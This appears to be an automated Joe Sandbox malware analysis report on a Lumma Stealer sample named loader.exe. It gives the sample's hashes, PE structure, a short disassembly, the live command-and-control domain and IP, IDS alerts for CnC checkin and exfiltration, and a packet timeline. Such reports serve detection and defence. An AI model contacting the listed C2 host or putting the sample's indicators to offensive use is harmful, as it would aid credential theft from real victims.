                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchloader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.microsofloader.exe, 00000005.00000003.1709492713.0000000005665000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://property-imper.sbs:443/apitPKloader.exe, 00000005.00000003.1863948333.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002D9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesloader.exe, 00000005.00000003.1709558120.00000000055F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.mozilla.org/products/firefoxgro.allloader.exe, 00000005.00000003.1755131727.00000000056E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                172.67.162.84
                                                                property-imper.sbsUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1561467
                                                                Start date and time:2024-11-23 14:08:33 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 4m 16s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:9
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:loader.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@10/0@1/1
                                                                EGA Information:
                                                                • Successful, ratio: 66.7%
                                                                HCA Information:
                                                                • Successful, ratio: 79%
                                                                • Number of executed functions: 32
                                                                • Number of non-executed functions: 98
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Stop behavior analysis, all processes terminated
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target loader.exe, PID 7348 because there are no executed function
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: loader.exe
                                                                TimeTypeDescription
                                                                08:09:25API Interceptor8x Sleep call for process: loader.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                172.67.162.84file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                    Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    property-imper.sbsfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.33.116
                                                                                    Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.162.84
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.33.116
                                                                                    file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                    • 104.21.33.116
                                                                                    psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 172.66.0.235
                                                                                    SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.88.250
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.33.116
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.67.179
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.20.178
                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.33.116
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                    • 172.67.162.84
                                                                                    psol.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                    • 172.67.162.84
                                                                                    SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.162.84
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.162.84
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.162.84
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                    • 172.67.162.84
                                                                                    No context
                                                                                    No created / dropped files found
                                                                                    File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.728279644396657
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:loader.exe
                                                                                    File size:495'104 bytes
                                                                                    MD5:eb9da66b64c00bc89fe8bb984995e7da
                                                                                    SHA1:fb0ef230ce7078220b9c0d8795ec88234d9c2f93
                                                                                    SHA256:340de30b05a843bd6a8fbdc1b58f7c3f2e9378c6c1a6b44108d0b7467a5f68c2
                                                                                    SHA512:238299fb7c51972e8675a1d009dd274ccfbcae49cd52fe702cf9ea3b0ebc99519ef78c6aa05f537e0abe5fd0a64051f9e5246b64eb7be6fce013cef53ff2fc4b
                                                                                    SSDEEP:12288:OJB+nneDgkXFEIPFHbTSmie2URLIMnfAaLRvpgCfd/j4Lc:yAoR2wbTS2LLI8IalpgCfZkw
                                                                                    TLSH:80B4F1AF73A390A3E6A3287141E49B75452E3F700F30A5FB57241F691B36AC28532E57
                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...t.@g............................pX............@.......................................@.................................T...<..
                                                                                    Icon Hash:90cececece8e8eb0
                                                                                    Entrypoint:0x415870
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows cui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x6740AA74 [Fri Nov 22 15:59:48 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:6
                                                                                    OS Version Minor:0
                                                                                    File Version Major:6
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:6
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:887797384d81c493a9d8ee55dad3b2e1
                                                                                    Instruction
                                                                                    call 00007F86AD8B268Ah
                                                                                    jmp 00007F86AD8B24EDh
                                                                                    mov ecx, dword ptr [0042B5F0h]
                                                                                    push esi
                                                                                    push edi
                                                                                    mov edi, BB40E64Eh
                                                                                    mov esi, FFFF0000h
                                                                                    cmp ecx, edi
                                                                                    je 00007F86AD8B2686h
                                                                                    test esi, ecx
                                                                                    jne 00007F86AD8B26A8h
                                                                                    call 00007F86AD8B26B1h
                                                                                    mov ecx, eax
                                                                                    cmp ecx, edi
                                                                                    jne 00007F86AD8B2689h
                                                                                    mov ecx, BB40E64Fh
                                                                                    jmp 00007F86AD8B2690h
                                                                                    test esi, ecx
                                                                                    jne 00007F86AD8B268Ch
                                                                                    or eax, 00004711h
                                                                                    shl eax, 10h
                                                                                    or ecx, eax
                                                                                    mov dword ptr [0042B5F0h], ecx
                                                                                    not ecx
                                                                                    pop edi
                                                                                    mov dword ptr [0042B5ECh], ecx
                                                                                    pop esi
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 14h
                                                                                    and dword ptr [ebp-0Ch], 00000000h
                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                    and dword ptr [ebp-08h], 00000000h
                                                                                    push eax
                                                                                    call dword ptr [0042946Ch]
                                                                                    mov eax, dword ptr [ebp-08h]
                                                                                    xor eax, dword ptr [ebp-0Ch]
                                                                                    mov dword ptr [ebp-04h], eax
                                                                                    call dword ptr [00429430h]
                                                                                    xor dword ptr [ebp-04h], eax
                                                                                    call dword ptr [0042942Ch]
                                                                                    xor dword ptr [ebp-04h], eax
                                                                                    lea eax, dword ptr [ebp-14h]
                                                                                    push eax
                                                                                    call dword ptr [004294A8h]
                                                                                    mov eax, dword ptr [ebp-10h]
                                                                                    lea ecx, dword ptr [ebp-04h]
                                                                                    xor eax, dword ptr [ebp-14h]
                                                                                    xor eax, dword ptr [ebp-04h]
                                                                                    xor eax, ecx
                                                                                    leave
                                                                                    ret
                                                                                    mov eax, 00004000h
                                                                                    ret
                                                                                    push 0042C970h
                                                                                    call dword ptr [00429488h]
                                                                                    ret
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    mov al, 01h
                                                                                    ret
                                                                                    push 00030000h
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x292540x3c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f0000x1400.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x237c00xc0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x293c80x138.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x2169a0x2180002aff72e65eaf052f891170e28598361False0.550606343283582data6.737058354414408IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x230000x72640x740091e5fdecc510d2c4e72b1b50db3c2501False0.40641837284482757data4.769873714467996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x2b0000x20680x1000f9b2b4b1f63578440eedd0ace5ac94f1False0.484375OpenPGP Secret Key5.090094544660231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .00cfg0x2e0000x80x200160c8b290b62e5e566d05ce3bec76423False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x2f0000x14000x140029fb367912ce622b91120c5cffd84495False0.81953125data6.557860970753822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                    .coS0x310000x4d6000x4d600ad66d6d60eda5d287fcd681bab58b4bcFalse1.0003344608239095data7.999374463743238IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    DLLImport
                                                                                    KERNEL32.dllCloseHandle, CompareStringW, CreateFileA, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                    GDI32.dllCreateEllipticRgn
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-11-23T14:09:25.528059+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730172.67.162.84443TCP
                                                                                    2024-11-23T14:09:26.245154+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730172.67.162.84443TCP
                                                                                    2024-11-23T14:09:26.245154+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730172.67.162.84443TCP
                                                                                    2024-11-23T14:09:27.573143+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.67.162.84443TCP
                                                                                    2024-11-23T14:09:28.294611+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731172.67.162.84443TCP
                                                                                    2024-11-23T14:09:28.294611+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.162.84443TCP
                                                                                    2024-11-23T14:09:29.889674+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.162.84443TCP
                                                                                    2024-11-23T14:09:32.141438+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.162.84443TCP
                                                                                    2024-11-23T14:09:32.862590+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449733172.67.162.84443TCP
                                                                                    2024-11-23T14:09:34.430730+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.162.84443TCP
                                                                                    2024-11-23T14:09:36.966027+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.162.84443TCP
                                                                                    2024-11-23T14:09:39.553578+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736172.67.162.84443TCP
                                                                                    2024-11-23T14:09:43.271902+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738172.67.162.84443TCP
                                                                                    2024-11-23T14:09:43.985225+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738172.67.162.84443TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 23, 2024 14:09:24.263079882 CET49730443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:24.263129950 CET44349730172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:24.263216972 CET49730443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:24.265993118 CET49730443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:24.266007900 CET44349730172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:25.527972937 CET44349730172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:25.528059006 CET49730443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:25.530560970 CET49730443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:25.530572891 CET44349730172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:25.530783892 CET44349730172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:25.571521997 CET49730443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:25.603298903 CET49730443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:25.603352070 CET49730443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:25.603427887 CET44349730172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:26.245163918 CET44349730172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:26.245234966 CET44349730172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:26.245296955 CET49730443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:26.251113892 CET49730443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:26.251141071 CET44349730172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:26.312973022 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:26.313028097 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:26.313122034 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:26.313400030 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:26.313415051 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:27.573041916 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:27.573143005 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:27.574348927 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:27.574363947 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:27.574583054 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:27.576297998 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:27.576344967 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:27.576365948 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.294600964 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.294629097 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.294652939 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.294708967 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.294718981 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.294730902 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.294770002 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.294794083 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.294841051 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.302756071 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.304960966 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.305027008 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.305044889 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.313400030 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.313474894 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.313487053 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.368408918 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.418040991 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.462146044 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.462157011 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.495834112 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.495866060 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.495886087 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.495908022 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.495956898 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.495961905 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.496032000 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.496192932 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.496207952 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.496217012 CET49731443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.496222019 CET44349731172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.585656881 CET49732443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.585755110 CET44349732172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:28.585855007 CET49732443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.586128950 CET49732443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:28.586164951 CET44349732172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:29.889530897 CET44349732172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:29.889673948 CET49732443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:29.890918016 CET49732443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:29.890959024 CET44349732172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:29.891177893 CET44349732172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:29.892841101 CET49732443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:29.892841101 CET49732443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:29.892894983 CET44349732172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:29.894217014 CET49732443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:29.894247055 CET44349732172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:30.751554012 CET44349732172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:30.751671076 CET44349732172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:30.751741886 CET49732443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:30.751952887 CET49732443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:30.752005100 CET44349732172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:30.877444983 CET49733443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:30.877479076 CET44349733172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:30.877562046 CET49733443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:30.877821922 CET49733443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:30.877835989 CET44349733172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:32.141218901 CET44349733172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:32.141438007 CET49733443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:32.143949986 CET49733443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:32.143965960 CET44349733172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:32.144191980 CET44349733172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:32.146111012 CET49733443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:32.146274090 CET49733443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:32.146305084 CET44349733172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:32.862601042 CET44349733172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:32.862715006 CET44349733172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:32.862819910 CET49733443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:32.862963915 CET49733443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:32.862983942 CET44349733172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:33.172427893 CET49734443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:33.172514915 CET44349734172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:33.172640085 CET49734443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:33.173089027 CET49734443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:33.173124075 CET44349734172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:34.430509090 CET44349734172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:34.430730104 CET49734443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:34.432423115 CET49734443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:34.432459116 CET44349734172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:34.432709932 CET44349734172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:34.434505939 CET49734443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:34.434724092 CET49734443192.168.2.4172.67.162.84
